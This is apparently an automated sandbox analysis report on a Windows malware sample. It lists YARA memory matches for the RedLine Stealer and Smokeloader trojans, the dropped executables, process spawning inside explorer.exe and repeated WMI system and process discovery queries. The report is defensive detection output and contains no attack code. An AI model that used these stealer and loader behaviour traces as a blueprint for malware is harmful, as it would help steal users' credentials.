    Source: C:\Windows\explorer.exeCode function: 19_2_00AA20F419_2_00AA20F4
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\8CAE.exe B139090C797214F88A2EA451289AB670000936C413CD2CD45AAA9895C78C63B5
    Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 00438801 appears 40 times
    Source: O4zPA1oI9Y.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000000.00000002.2233484367.000000000061F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 0000000A.00000002.3040636907.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 0000000A.00000002.3041248373.0000000000743000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000006.00000002.2516872418.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 0000000A.00000002.3040798589.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000009.00000002.2777517126.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000000.00000002.2233359138.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000006.00000002.2516805210.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000009.00000002.2777599585.00000000006D3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000009.00000002.2777432655.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000002.2233667706.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000006.00000002.2517016123.00000000007DD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000000.00000002.2233749509.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000006.00000002.2516839505.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000009.00000002.2777687762.00000000008D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 0000000A.00000002.3041046973.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
    Source: O4zPA1oI9Y.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: DE97.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: uegasii.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: jvgasii.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@61/15@9/4
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_00622A07 CreateToolhelp32Snapshot,Module32First,0_2_00622A07
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeCode function: 11_2_00007FF7CBCA7138 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,11_2_00007FF7CBCA7138
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jvgasiiJump to behavior
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\DE97.tmpJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
    Source: O4zPA1oI9Y.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, CommandLine, ExecutablePath, ProcessId FROM Win32_Process
    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;92&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;92&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;328&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;328&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;412&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;412&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;488&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;488&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;496&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;496&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;560&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;560&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;632&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;632&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;652&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;652&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;752&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;752&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;780&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;780&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;788&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;788&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;868&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;868&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;928&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;928&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;996&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;996&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;436&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;436&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;376&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;376&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;60&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;60&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;980&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;980&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1040&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1040&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1064&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1064&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1140&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1140&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1192&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1192&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1248&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1248&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1328&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1328&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1344&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1344&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1356&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1356&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1448&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1448&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1496&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1496&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1516&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1516&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1528&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1528&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1560&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1560&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1640&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1640&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1648&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1648&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1784&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1784&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1872&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1872&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1900&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1900&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1980&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1980&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1988&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1988&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2000&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2000&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1704&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1704&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2076&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2076&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2088&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2088&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2148&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2148&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2236&quot;::GetOwner
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2236&quot;::GetOwner
